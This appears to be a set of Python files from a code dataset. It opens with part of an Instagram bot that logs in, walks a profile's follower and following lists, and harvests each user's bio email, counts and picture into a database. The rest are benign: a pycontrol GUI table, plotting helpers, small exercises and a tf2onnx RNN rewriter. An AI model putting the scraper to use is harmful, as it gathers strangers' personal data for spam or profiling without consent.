'//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a')))\n except TimeoutException:\n raise TimeoutException\n\n try:\n element = self.driver.find_element_by_xpath(\n 
'//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a')\n self.driver.execute_script(\"arguments[0].click();\", element)\n\n except:\n raise AttributeError\n\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located((By.XPATH, '//div[@role=\"dialog\"]//ul/parent::div')))\n except TimeoutException:\n raise TimeoutException\n\n self.get_all_usernames(self.get_subscribers_count())\n\n def get_subscribers_count(self):\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n scraper = Scraper(False, self.driver)\n\n try:\n followers = soup.find_all('span', 'g47SY')[1].text\n followers = followers.replace(' ', '')\n if 'm' in followers:\n followers = followers.replace('m', '')\n followers = float(followers) * 1000000\n if 'k' in followers:\n followers = followers.replace('k', '')\n followers = float(followers) * 1000\n\n return float(str(scraper.get_followers(str(followers))))\n\n except AttributeError:\n return '0'\n except IndexError:\n return '0'\n\n def get_all_usernames(self, subscribers):\n try:\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n usernames_count = len(soup.find_all('a', 'FPmhX'))\n while usernames_count < subscribers - 10:\n element = self.driver.find_element_by_xpath('//div[@role=\"dialog\"]//ul/parent::div')\n self.driver.execute_script('arguments[0].scrollTop = arguments[0].scrollHeight', element)\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n usernames_count = len(soup.find_all('a', 'FPmhX'))\n\n usernames_count = soup.find_all('a', 'FPmhX')\n for username in usernames_count:\n self.driver.get('https://www.instagram.com/{}/'.format(username.string))\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[1]/span')))\n except TimeoutException:\n raise TimeoutException\n\n scraper = Scraper(self.email_only, self.driver)\n scraper.scrape_profile()\n\n\n except AttributeError:\n pass\n\n\nclass Scraper():\n def __init__(self, email_only, driver):\n self.email_only = email_only\n self.driver = driver\n\n def has_email(self, soup):\n try:\n div = soup.find('div', '-vDIg')\n description = div.findChild('span').text\n email = re.findall(r'(\\w+@.+\\.\\w+)', description)\n if len(email) > 0:\n return True\n else:\n return False\n\n except AttributeError:\n return False\n\n def scrape_email(self, soup):\n try:\n div = soup.find('div', '-vDIg')\n description = div.findChild('span').text\n result = re.findall(r'(\\w+@.+\\.\\w+)', description)[0]\n return result\n except AttributeError:\n return ' '\n except IndexError:\n return ' '\n\n def scrape_profile(self):\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n if self.email_only:\n if self.has_email(soup):\n username = self.scrape_username(soup)\n posts = str(self.scrape_posts(soup)).replace(' ', '')\n following = self.scrape_following(soup)\n followers = self.scrape_subscribers(soup)\n full_name = self.scrape_name(soup)\n description = self.scrape_profile_description(soup)\n email = self.scrape_email(soup)\n pic = self.scrape_profile_picture(soup)\n subscribed_on_your_profile = self.subscribed_on_you(soup)\n you_subscribed = self.you_subscrided(soup)\n user = Users(username=username, posts=posts, followers=followers, following=following, name=full_name,\n description=description, email=email,\n subscribed_on_your_profile=subscribed_on_your_profile,\n you_subscribed=you_subscribed, picture=pic)\n user.save()\n else:\n username = self.scrape_username(soup)\n posts = 
str(self.scrape_posts(soup)).replace(' ', '')\n            following = self.scrape_following(soup)\n            followers = self.scrape_subscribers(soup)\n            full_name = self.scrape_name(soup)\n            description = self.scrape_profile_description(soup)\n            email = self.scrape_email(soup)\n            pic = self.scrape_profile_picture(soup)\n            subscribed_on_your_profile = self.subscribed_on_you(soup)\n            you_subscribed = self.you_subscrided(soup)\n            user = Users(username=username, posts=posts, followers=followers, following=following, name=full_name,\n                         description=description, email=email, subscribed_on_your_profile=subscribed_on_your_profile,\n                         you_subscribed=you_subscribed, picture=pic)\n            user.save()\n        sleep(0.5)\n\n    def scrape_username(self, soup):\n        try:\n            return soup.find('h2', '_7UhW9').string\n        except AttributeError:\n            try:\n                sleep(1)\n                return soup.find('h2', '_7UhW9').string\n            except AttributeError:\n                return 'None'\n\n    def scrape_posts(self, soup):\n        try:\n            return soup.find_all('span', 'g47SY')[0].string\n        except AttributeError:\n            return '0'\n        except IndexError:\n            return '0'\n\n    def scrape_subscribers(self, soup):\n        try:\n            return soup.find_all('span', 'g47SY')[1].text\n        except AttributeError:\n            return '0'\n        except IndexError:\n            return '0'\n\n    def scrape_following(self, soup):\n        try:\n            return soup.find_all('span', 'g47SY')[2].text\n        except AttributeError:\n            return '0'\n        except IndexError:\n            return '0'\n\n    def scrape_name(self, soup):\n        try:\n            return soup.find('h1', 'rhpdm').text\n        except AttributeError:\n            return ' '\n\n    def scrape_profile_description(self, soup):\n        try:\n            div = soup.find('div', '-vDIg')\n            return div.findChild('span').text\n        except AttributeError:\n            return ' '\n\n    def scrape_profile_picture(self, soup):\n        try:\n            pic = soup.find('img', '_6q-tv')['src']\n            if len(pic) < 250:\n                return pic\n            else:\n                return ' '\n\n        except AttributeError:\n            raise Exception('imgERROR')\n\n    def you_subscrided(self, soup):\n        try:\n            if soup.find('button', '-fzfL'):\n                return 'Yes'\n            else:\n                return ' '\n        except AttributeError:\n            return ' '\n\n    def subscribed_on_you(self, soup):\n        try:\n            if soup.find('button', '_5f5mN').string == 'Follow Back':\n                return 'Yes'\n            else:\n                return ' '\n        except AttributeError:\n            return ' '\n\n    def get_followers(self, followers):\n        if 'm' in followers:\n            followers = followers.replace('m', '').replace(' ', '')\n            return str(int(float(followers) * 1000000))\n\n        elif 'k' in followers:\n            followers = followers.replace('k', '').replace(' ', '')\n            return str(int(float(followers) * 1000))\n\n        else:\n            return followers.replace(',', '.')\n\n    def get_following(self, following):\n        if 'm' in following:\n            following = following.replace('m', '').replace(' ', '')\n\n            return str(int(float(following) * 1000000))\n\n        elif 'k' in following:\n            following = following.replace('k', '').replace(' ', '')\n\n            return str(int(float(following) * 1000))\n\n        else:\n            return following.replace(',', '.')\n\n\ndef xpath_soup(element):\n    components = []\n    child = element if element.name else element.parent\n    for parent in child.parents:\n        siblings = parent.find_all(child.name, recursive=False)\n        components.append(\n            child.name if 1 == len(siblings) else '%s[%d]' % (\n                child.name,\n                next(i for i, s in enumerate(siblings, 1) if s is child)\n            )\n        )\n        child = parent\n    components.reverse()\n    return '/%s' % '/'.join(components)\n\n\ndef main(profiles, private_only: False, business_only: False, email_only: False, proxy_port: None, proxy_host: '',\n         login, password):\n    scraper = Cliker(profiles, private_only, business_only, email_only, proxy_port, proxy_host)\n    scraper.login(login, password)\n    
for profile in profiles:\n profile = profile.replace(' ', '')\n scraper.find_profile(profile)\n scraper.click_following()\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"scraper/scraper_engine/following_collector.py","file_name":"following_collector.py","file_ext":"py","file_size_in_byte":12620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"13995240","text":"from functools import partial\nfrom typing import List\n\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom pycontrol_homecage.utils import (TableCheckbox, cbox_set_item, cbox_update_options,\n null_resize)\n\n\nclass variables_table(QtGui.QTableWidget):\n \" Table that tracks what variables a mouse currently running in a task has\"\n\n def __init__(self, parent=None):\n super(QtGui.QTableWidget, self).__init__(1, 7, parent=parent)\n self.headers = ['Variable', 'Subject', 'Value', 'Persistent', 'Summary', 'Set', '']\n self.setHorizontalHeaderLabels(self.headers)\n self.horizontalHeader().setResizeMode(0, QtGui.QHeaderView.Stretch)\n self.horizontalHeader().setResizeMode(2, QtGui.QHeaderView.Stretch)\n self.horizontalHeader().setResizeMode(5, QtGui.QHeaderView.ResizeToContents)\n self.verticalHeader().setVisible(False)\n add_button = QtGui.QPushButton(' add ')\n self.setCellWidget(0, 5, add_button)\n self.n_variables = 0\n self.variable_names = []\n self.available_variables = []\n self.assigned = {v_name: [] for v_name in self.variable_names} # Which subjects have values assigned for each variable.\n self.subject_variable_names = {}\n\n def remove_variable(self, variable_n: int) -> None:\n self.removeRow(variable_n)\n self.n_variables -= 1\n self.update_available()\n null_resize(self)\n\n def reset(self):\n '''Clear all rows of table.'''\n for i in reversed(range(self.n_variables)):\n self.removeRow(i)\n self.n_variables = 0\n self.assigned = {v_name: [] for v_name in self.variable_names} \n\n def add_variable(self, var_dict: dict = None) -> None:\n\n '''Add a row to the variables table.'''\n variable_cbox = QtGui.QComboBox()\n variable_cbox.activated.connect(self.update_available)\n subject_cbox = QtGui.QComboBox()\n subject_cbox.activated.connect(self.update_available)\n persistent = TableCheckbox()\n summary = TableCheckbox()\n set_var = TableCheckbox()\n \n set_var.checkbox.stateChanged.connect(partial(self.setVar_changed, self.n_variables))\n persistent.checkbox.stateChanged.connect(partial(self.persistent_changed, self.n_variables))\n remove_button = QtGui.QPushButton('remove')\n ind = QtCore.QPersistentModelIndex(self.model().index(self.n_variables, 2))\n remove_button.clicked.connect(lambda: self.remove_variable(ind.row()))\n add_button = QtGui.QPushButton(' add ')\n add_button.clicked.connect(self.add_variable)\n self.insertRow(self.n_variables+1)\n self.setCellWidget(self.n_variables ,0, variable_cbox)\n self.setCellWidget(self.n_variables ,1, subject_cbox)\n self.setCellWidget(self.n_variables ,3, persistent)\n self.setCellWidget(self.n_variables ,4, summary)\n self.setCellWidget(self.n_variables ,5, set_var)\n self.setCellWidget(self.n_variables ,6, remove_button)\n self.setCellWidget(self.n_variables+1,6, add_button)\n if var_dict: # Set cell values from provided dictionary.\n variable_cbox.addItems([var_dict['name']])\n subject_cbox.addItems([var_dict['subject']])\n value_item = QtGui.QTableWidgetItem()\n value_item.setText(var_dict['value'])\n self.setItem(self.n_variables, 2, value_item)\n persistent.setChecked(var_dict['persistent'])\n 
summary.setChecked(var_dict['summary'])\n set_var.setChecked(var_dict['set'])\n else:\n variable_cbox.addItems(['select variable']+self.available_variables)\n if self.n_variables > 0: # Set variable to previous variable if available.\n v_name = str(self.cellWidget(self.n_variables-1, 0).currentText())\n if v_name in self.available_variables:\n cbox_set_item(variable_cbox, v_name)\n subject_cbox.addItems(self.available_subjects(v_name))\n self.n_variables += 1\n self.update_available()\n null_resize(self)\n\n def persistent_changed(self, row: int) -> None:\n \"\"\" A variables cannot be both persistent and set\"\"\"\n # print(\"updateing\",row)\n self.cellWidget(row, 5).setChecked(False)\n self.item(row, 2).setText(\"auto\")\n\n def setVar_changed(self, row: int) -> None:\n self.cellWidget(row, 3).setChecked(False)\n\n def update_available(self, i=None):\n # Find out what variable-subject combinations already assigned.\n self.assigned = {v_name: [] for v_name in self.variable_names}\n\n # to maintain consistency with main pycontrol, the way this works\n # is by setting variables assigned that\n for v_name in self.variable_names:\n for subject, vars_ in self.subject_variable_names.items():\n\n if v_name not in vars_:\n self.assigned[v_name].append(subject)\n\n # print(self.assigned)\n for v in range(self.n_variables):\n v_name = self.cellWidget(v, 0).currentText()\n s_name = self.cellWidget(v, 1).currentText()\n if s_name and s_name not in self.subjects_in_group + ['all']:\n cbox_set_item(self.cellWidget(v, 1), '', insert=True)\n continue\n if v_name != 'select variable' and s_name:\n self.assigned[v_name].append(s_name)\n # Update the variables available:\n fully_asigned_variables = [v_n for v_n in self.assigned.keys()\n if 'all' in self.assigned[v_n]]\n if self.subjects_in_group:\n fully_asigned_variables += [v_n for v_n in self.assigned.keys()\n if set(self.assigned[v_n]) == set(self.subjects_in_group)]\n self.available_variables = sorted(list(\n set(self.variable_names) - set(fully_asigned_variables)), key=str.lower)\n # Update the available options in the variable and subject comboboxes.\n\n for v in range(self.n_variables):\n v_name = self.cellWidget(v, 0).currentText()\n s_name = self.cellWidget(v, 1).currentText()\n cbox_update_options(self.cellWidget(v, 0), self.available_variables)\n if v_name != 'select variable':\n # If variable has no subjects assigned, set subjects to 'all'.\n if not self.assigned[v_name]:\n self.cellWidget(v, 1).addItems(['all'])\n self.assigned[v_name] = ['all']\n self.available_variables.remove(v_name)\n cbox_update_options(self.cellWidget(v, 1), self.available_subjects(v_name, s_name))\n\n def set_available_subjects(self, subjects: List[str]):\n self.subjects_in_group = subjects\n\n def set_variable_names(self, variable_names: List[str]):\n \"\"\" \"\"\"\n if not self.variable_names:\n self.variable_names = variable_names\n else:\n # print(self.variable_names,variable_names)\n self.variable_names.extend(variable_names)\n self.variable_names = list(set(self.variable_names))\n\n def set_variable_names_by_subject(self, subject: str, variable_names: List[str]) -> None:\n \"\"\" Allow tracking of which subject has which variables available\n to them in principle\n \"\"\"\n self.subject_variable_names[subject] = variable_names\n\n def available_subjects(self, v_name, s_name=None):\n '''Return sorted list of the subjects that are available for selection\n for the specified variable v_name given that subject s_name is already\n selected.'''\n if (not 
self.assigned[v_name]) or self.assigned[v_name] == [s_name]:\n available_subjects = ['all'] + sorted(self.subjects_in_group)\n else:\n available_subjects = sorted(list(set(self.subjects_in_group) -\n set(self.assigned[v_name])))\n return available_subjects\n\n def variables_list(self):\n '''Return the variables table contents as a list of dictionaries.'''\n return [{'name' : str(self.cellWidget(v, 0).currentText()),\n 'subject' : str(self.cellWidget(v, 1).currentText()),\n 'value' : str(self.item(v, 2).text()) if self.item(v, 2) else '',\n 'persistent': self.cellWidget(v, 3).isChecked(),\n 'summary' : self.cellWidget(v, 4).isChecked(),\n 'set' : self.cellWidget(v, 5).isChecked()}\n for v in range(self.n_variables)]\n","sub_path":"build/lib/pycontrol_homecage/tables/variables_table.py","file_name":"variables_table.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"138740634","text":"\"\"\"\nThis file may not be shared/redistributed without permission. Please read copyright notice in the git repo. If this file contains other copyright notices disregard this text.\n\"\"\"\nimport os\nimport numpy as np\n\n\"\"\"\nUsing the plotter:\n\nCall it from the command line, and supply it with logdirs to experiments.\nSuppose you ran an experiment with name 'test', and you ran 'test' for 10 \nrandom seeds. The runner code stored it in the directory structure\n\n data\n L test_EnvName_DateTime\n L 0\n L log.txt\n L params.json\n L 1\n L log.txt\n L params.json\n .\n .\n .\n L 9\n L log.txt\n L params.json\n\nTo plot learning curves from the experiment, averaged over all random\nseeds, call\n\n python lmpc_plot.py data/test_EnvName_DateTime --value AverageReturn\n\nand voila. To see a different statistics, change what you put in for\nthe keyword --value. You can also enter /multiple/ values, and it will \nmake all of them in order.\n\n\nSuppose you ran two experiments: 'test1' and 'test2'. In 'test2' you tried\na different set of hyperparameters from 'test1', and now you would like \nto compare them -- see their learning curves side-by-side. Just call\n\n python lmpc_plot.py data/test1 data/test2\n\nand it will plot them both! They will be given titles in the legend according\nto their exp_name parameters. 
If you want to use custom legend titles, use\nthe --legend flag and then provide a title for each logdir.\n\n\"\"\"\n\ndef plot_data(data, y=\"accumulated_reward\", x=\"Episode\", ci=95, estimator='mean', **kwargs):\n    import seaborn as sns\n    import matplotlib.pyplot as plt\n    import pandas as pd\n    if isinstance(data, list): # is this correct even?\n        data = pd.concat(data, ignore_index=True,axis=0)\n    plt.figure(figsize=(12, 6))\n    sns.set(style=\"darkgrid\", font_scale=1.5)\n    lp = sns.lineplot(data=data, x=x, y=y, hue=\"Condition\", ci=ci, estimator=estimator, **kwargs)\n    plt.legend(loc='best') #.set_draggable(True)\n\ndef existing_runs(experiment):\n    nex = 0\n    for root, dir, files in os.walk(experiment):\n        if 'log.txt' in files:\n            nex += 1\n    return nex\n\ndef _get_most_recent_log_dir(fpath):\n    files = [os.path.basename(root) for root, dir, files in os.walk(fpath) if 'log.txt' in files]\n    return sorted(files, key=lambda file: os.path.basename(file))[-1] if len(files) > 0 else None\n\ndef get_datasets(fpath, x, condition=None, smoothing_window=None, resample_key=None, resample_ticks=None, only_most_recent=False):\n    import pandas as pd\n    import json\n    unit = 0\n    if condition is None:\n        condition = fpath\n    datasets = []\n\n    if only_most_recent:\n        most_recent = _get_most_recent_log_dir(fpath)\n\n    for root, dir, files in os.walk(fpath):\n        print(files)\n        if 'log.txt' in files:\n            if only_most_recent and most_recent is not None and os.path.basename(root) != most_recent: # Skip this log.\n                continue\n            json_path = os.path.join(root, 'params.json')\n            if os.path.exists(json_path):\n                with open(json_path) as param_path:\n                    params = json.load(param_path)\n                # exp_name = params['exp_name']\n\n            log_path = os.path.join(root, 'log.txt')\n            if os.stat(log_path).st_size == 0:\n                print(\"Bad plot file\", log_path, \"size is zero. 
Skipping\")\n continue\n experiment_data = pd.read_table(log_path)\n\n if smoothing_window:\n ed_x = experiment_data[x]\n experiment_data = experiment_data.rolling(smoothing_window,min_periods=1).mean()\n experiment_data[x] = ed_x\n\n experiment_data.insert(\n len(experiment_data.columns),\n 'Unit',\n unit\n )\n experiment_data.insert(\n len(experiment_data.columns),\n 'Condition',\n condition)\n\n datasets.append(experiment_data)\n unit += 1\n\n nc = f\"({unit}x)\"+condition[condition.rfind(\"/\")+1:]\n for i, d in enumerate(datasets):\n datasets[i] = d.assign(Condition=lambda x: nc)\n\n if resample_key is not None:\n nmax = 0\n vmax = -np.inf\n vmin = np.inf\n for d in datasets:\n nmax = max( d.shape[0], nmax)\n vmax = max(d[resample_key].max(), vmax)\n vmin = min(d[resample_key].min(), vmin)\n if resample_ticks is not None:\n nmax = min(resample_ticks, nmax)\n\n new_datasets = []\n tnew = np.linspace(vmin + 1e-6, vmax - 1e-6, nmax)\n for d in datasets:\n nd = {}\n cols = d.columns.tolist()\n for c in cols:\n if c == resample_key:\n y = tnew\n elif d[c].dtype == 'O':\n y = [ d[c][0] ] * len(tnew)\n else:\n y = np.interp(tnew, d[resample_key].tolist(), d[c], left=np.nan, right=np.nan)\n y = y.astype(d[c].dtype)\n nd[c] = y\n\n ndata = pd.DataFrame(nd)\n ndata = ndata.dropna()\n new_datasets.append(ndata)\n datasets = new_datasets\n return datasets\n\n\ndef _load_data(experiments, legends=None, smoothing_window=None, resample_ticks=None,\n x_key=\"Episode\",\n only_most_recent=False):\n ensure_list = lambda x: x if isinstance(x, list) else [x]\n experiments = ensure_list(experiments)\n if legends is None:\n legends = experiments\n legends = ensure_list(legends)\n\n data = []\n for logdir, legend_title in zip(experiments, legends):\n resample_key = x_key if resample_ticks is not None else None\n data += get_datasets(logdir, x=x_key, condition=legend_title, smoothing_window=smoothing_window, resample_key=resample_key, resample_ticks=resample_ticks,\n only_most_recent=only_most_recent)\n return data\n\ndef main_plot(experiments, legends=None, smoothing_window=None, resample_ticks=None,\n x_key=\"Episode\",\n y_key='Accumulated Reward',\n no_shading=False,\n **kwargs):\n if no_shading:\n kwargs['units'] = 'Unit'\n kwargs['estimator'] = None\n\n ensure_list = lambda x: x if isinstance(x, list) else [x]\n experiments = ensure_list(experiments)\n\n if legends is None:\n legends = experiments\n legends = ensure_list(legends)\n\n data = []\n for logdir, legend_title in zip(experiments, legends):\n resample_key = x_key if resample_ticks is not None else None\n data += get_datasets(logdir, x=x_key, condition=legend_title, smoothing_window=smoothing_window, resample_key=resample_key, resample_ticks=resample_ticks)\n\n plot_data(data, y=y_key, x=x_key, **kwargs)\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('logdir', nargs='*')\n parser.add_argument('--legend', nargs='*')\n parser.add_argument('--value', default='AverageReturn', nargs='*')\n parser.add_argument('--title', default=\"please specify title\", help=\"The title to show\")\n parser.add_argument('--pdf_name', default=None, help=\"Name of pdf\")\n\n args = parser.parse_args()\n main_plot(args.logdir, args.legend, args.value, title=args.title)\n\nif __name__ == \"__main__\":\n main()\n\n\n#### TRAJECTORY PLOTTING HERE ####\ndef plot_trajectory(trajectory, env=None, xkeys=None, ukeys=None):\n # get labels, etc.\n if xkeys is None:\n xkeys = [i for i in range(trajectory.state.shape[1])]\n\n if ukeys 
is None: # all\n ukeys = [i for i in range(trajectory.action.shape[1])]\n import seaborn as sns\n import matplotlib.pyplot as plt\n import pandas as pd\n plt.figure(figsize=(12, 6))\n sns.set(style=\"darkgrid\", font_scale=1.5)\n def fp(time, X, keys, labels):\n for i, k in enumerate(keys):\n label = labels[k] if labels is not None else None\n lp = sns.lineplot(x=time, y=X[:,k], label=label)\n\n time = trajectory.time.squeeze()\n fp(time, trajectory.state, xkeys, labels=env.state_labels if env is not None else None)\n fp(time[:-1], trajectory.action, ukeys, labels=env.action_labels if env is not None else None)\n\n if env is not None:\n plt.legend()\n","sub_path":"irlc/utils/irlc_plot.py","file_name":"irlc_plot.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"282154544","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport statistics\n\nN = int(input())\nele = list(map(int, input().rstrip().split()))\nfre = list(map(int, input().rstrip().split()))\narr = []\n\nfor i in range(N):\n arr.extend([ele[i]]*fre[i])\n\narr.sort()\nmidpoint = sum(fre)//2\nq1 = statistics.median(arr[:midpoint])\nq3 = statistics.median(arr[-midpoint:])\n\nprint('%.1f' % (q3-q1))\n","sub_path":"10 Days of Statistics/day01_interquartile_range.py","file_name":"day01_interquartile_range.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"67032567","text":"\"\"\"\r\n\n\nGiven a square list ( _n_ * _n_ size) implement a function that returns a new\nlist containing two lists equal to the two diagonals, in the following order:\n\n diagonal 1 = from upper-left to lower-right corner\n diagonal 2 = from upper-right to lower-left corner\n\n### Examples\n\n get_diagonals([ [1, 2], [3, 4] ]) ➞ [ [1, 4], [2, 3] ]\n \n get_diagonals([ [\"a\", \"b\", \"c\"], [\"d\", \"e\", \"f\"], [\"g\", \"h\", \"i\"] ]) ➞ [ [\"a\", \"e\", \"i\"], [\"c\", \"e\", \"g\"] ]\n \n get_diagonals([ [True] ]) ➞ [ [True], [True] ]\n\n### Notes\n\n * Your function must also work with single elements or empty lists.\n * Try to build both diagonals with a single loop.\n\n\"\"\"\r\n\nimport numpy as np\ndef get_diagonals(lst):\n if not lst: \n return [[],[]]\n \n lst = np.array(lst)\n a = list(lst.diagonal()) #Converted back to list due to numpy bug\n b = list(np.flipud(lst).diagonal()[::-1])\n \n return [a,b]\n\n","sub_path":"LQgpGFMK9t9MELvph_2.py","file_name":"LQgpGFMK9t9MELvph_2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"285224183","text":"# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT license.\n\n\"\"\"\ntf2onnx.rewriter.rnn_unit_base - lstm support\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nfrom onnx import onnx_pb\nfrom tf2onnx import utils\nfrom tf2onnx.rewriter.rnn_utils import get_pattern, RnnProperties, \\\n    check_is_timemajor_transpose, REWRITER_RESULT\nfrom tf2onnx.graph_matcher import OpTypePattern, GraphMatcher # pylint: disable=unused-import\n\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(\"tf2onnx.rewriter.rnn_unit_writer_base\")\n\n# pylint: disable=invalid-name,unused-argument,missing-docstring\n\n# dynamic_rnn or bidirectional_dynamic_rnn related logic will be mapped to this base class.\nclass UnitRewriterBase(object):\n    def __init__(self, g):\n        self.g = g\n        self.all_nodes = self.g.get_nodes()\n        # checker signature : func_name(enter_target_node_input_id, identity_consumers, match)\n        # exit connector signature: func_name(rnn_node, exit_node, rnn_props)\n        self.switch_checkers = {}\n\n    def run(self, unit_type):\n        \"\"\"\n        main procedures:\n        1 use cell op pattern to find cell >> the found cell is the start pointer of the procedures below\n        2 find needed info from tensorflow graph:\n            1 rnn scope name\n            2 input_x\n            3 weight\n            4 sequence node\n            5 initializer\n            6 state output & hidden output\n        3 process found info according to ONNX requirement\n\n        remember: op pattern and scope name are useful\n        they are used to get needed info from tensorflow graph\n        raw found info needs to be formatted according to ONNX requirement\n        \"\"\"\n        # allow_reorder must be true, because LSTMCell and BasicLSTMCell's call function\n        # are defining the calculation with different orders. Then we can share the same\n        # pattern.\n        cell_pattern = get_pattern(unit_type)\n        matcher = GraphMatcher(cell_pattern, allow_reorder=True)\n        match_results = list(matcher.match_ops(self.g.get_nodes()))\n\n        if match_results:\n            for match in match_results:\n                self.run_single_match(match)\n\n            self.g.delete_unused_nodes(self.g.output_names)\n            self.g.update_proto()\n            self.print_step(\"finish handling\")\n\n        return self.g.get_nodes()\n\n    def run_single_match(self, match):\n        \"\"\"\n        methods to get needed info from tf graph:\n        1 input_x: specific node in found cell, then trace TensorArrayReadV >..>input of \"TensorArrayScatterV\",\n           if \"Transpose\" found under rnn scope, then input of \"Transpose\" is \"input_x\"\n        2 weight: specific node in cell computation graph and specific op pattern as input_x\n        3 sequence node: \"Identity\" op with name \"sequence_length\", the name is hard-coded in tensorflow code\n        4 state initializer: \"LoopCond\" and then specific op pattern >> LoopCond > Switch > Switch usage checker\n        5 hidden output and state output: find switch and use switch checker to distinguish different switch nodes\n\n        6 scope name of rnn and gru/lstm cell: specific node in cell computation graph,\n          and use found convention in tensorflow code to split name of node to get needed scope name\n\n        most found info is stored in \"rnn_props\"\n        \"\"\"\n        log.debug(\"=========================\")\n        self.print_step(\"start handling a new potential rnn cell\")\n        self.all_nodes = self.g.get_nodes()\n        # FIXME:\n        # pylint: disable=assignment-from-none,assignment-from-no-return\n\n        # when bi-directional, node in while will be rnnxx/fw/fw/while/... >> scope name is rnnxx/fw/fw\n        # when single direction, node in while will be rnnxx/while/... 
>> scope name is rnnxx\n        # and rnnxx can be assigned by users but not \"fw\", though maybe \"FW\" in another tf version\n        rnn_scope_name = self.get_rnn_scope_name(match)\n        if not rnn_scope_name:\n            log.debug(\"unable to find rnn scope name, skip\")\n            return REWRITER_RESULT.SKIP\n        log.debug(\"rnn scope name is %s\", rnn_scope_name)\n\n        self.print_step(\"get_weight_and_bias starts\")\n        rnn_weights = self.get_weight_and_bias(match)\n        if not rnn_weights:\n            log.debug(\"rnn weights check failed, skip\")\n            return REWRITER_RESULT.SKIP\n\n        rnn_props = RnnProperties()\n        res = self.get_var_initializers(match, rnn_props, rnn_scope_name)\n        if not res or not rnn_props.var_initializers.keys():\n            log.debug(\"no cell variable initializers found, skip\")\n            return REWRITER_RESULT.SKIP\n\n        seq_len_input_node = self.find_sequence_length_node(rnn_scope_name)\n        input_filter = self.get_rnn_input_blacklist(rnn_weights, rnn_props)\n        if seq_len_input_node:\n            input_filter.append(seq_len_input_node)\n\n        self.find_inputs(rnn_scope_name, rnn_props, match, input_filter)\n        if not rnn_props.is_valid():\n            log.debug(\"rnn properties are not valid, skip\")\n            return REWRITER_RESULT.SKIP\n\n        if not self.process_input_x(rnn_props, rnn_scope_name):\n            log.debug(\"rnn input x not found, skip\")\n            return REWRITER_RESULT.SKIP\n\n        self.print_step(\"process the weights/bias/ft_bias, to fit onnx weights/bias requirements\")\n        self.process_weights_and_bias(rnn_weights, rnn_props)\n\n        _, batch_size_node = self.process_seq_length(rnn_props, seq_len_input_node)\n        rnn_props.batch_size_node = batch_size_node\n\n        self.process_var_init_nodes(rnn_props)\n\n        self.print_step(\"start to build new rnn node\")\n\n        rnn_props.activation = self.get_rnn_activation(match)\n\n        rnn_node = self.create_rnn_node(rnn_props)\n        self.all_nodes.append(rnn_node)\n\n        self.print_step(\"start to handle outputs\")\n        # format of ONNX output is different from tf\n        self.process_outputs(match, rnn_node, rnn_props, rnn_scope_name)\n        # FIXME:\n        # pylint: enable=assignment-from-none,assignment-from-no-return\n        return REWRITER_RESULT.OK\n\n# find needed info from graph\n    def get_rnn_scope_name(self, match):\n        pass\n\n    def get_cell_scope_name(self, match):\n        return None\n\n    @staticmethod\n    def get_rnn_activation(match):\n        return None\n\n    def get_weight_and_bias(self, match):\n        pass\n\n    def get_var_initializers(self, match, rnn_props, rnn_scope_name):\n        \"\"\"\n        initializer op can be found by tracing from a switch node. 
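# A hedged, library-free sketch of the Switch -> Merge -> Enter tracing that
# get_var_initializers and check_switch_by_usage_pattern describe; the
# dict-based toy graph below is invented for illustration and is not
# tf2onnx's real node API.
def trace_initializer(switch):
    if switch["type"] != "Switch":
        return None
    merge = switch["inputs"][0]  # first input of a loop Switch is the data path
    if merge["type"] != "Merge":
        return None
    for merge_input in merge["inputs"]:
        if merge_input["type"] == "Enter":
            return merge_input["inputs"][0]  # the tensor feeding the loop Enter
    return None

const = {"type": "Const", "inputs": []}
enter = {"type": "Enter", "inputs": [const]}
merge = {"type": "Merge", "inputs": [enter]}
switch = {"type": "Switch", "inputs": [merge]}
assert trace_initializer(switch) is const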
while rnn has multiple switch nodes,\n so have to discriminate them by a check.\n switch nodes can be found by tracing LoopCond\n \"\"\"\n loop_cond_op = None\n for n in self.g.get_nodes():\n if n.type == 'LoopCond' and n.name.startswith(rnn_scope_name):\n if not loop_cond_op:\n loop_cond_op = n\n else:\n log.debug(\"only a LoopCond is expected, rnn scope name:%s\", rnn_scope_name)\n return None\n\n if loop_cond_op is None:\n log.debug(\"No LoopCond op is found, skip\")\n return None\n\n switch_nodes = self.g.find_output_consumers(loop_cond_op.output[0])\n for n in switch_nodes:\n if n.type != 'Switch':\n raise ValueError(\"LoopCond's output node should be followed with a Switch node\")\n\n for var_name, funcs in self.switch_checkers.items():\n var_checker = funcs[0]\n if not funcs[2]:\n continue\n enter_target_input_id = self.check_switch_by_usage_pattern(n, match, var_checker)\n if enter_target_input_id:\n log.debug(\"found initializer node for \" + var_name + \": \" + enter_target_input_id)\n rnn_props.var_initializers[var_name] = enter_target_input_id\n break\n return rnn_props.var_initializers\n\n def find_sequence_length_node(self, rnn_scope_name):\n # \"sequence_length\" under current rnn scope is the seq len node (if there is).\n # this is hardcoded in dynamic_rnn().\n\n 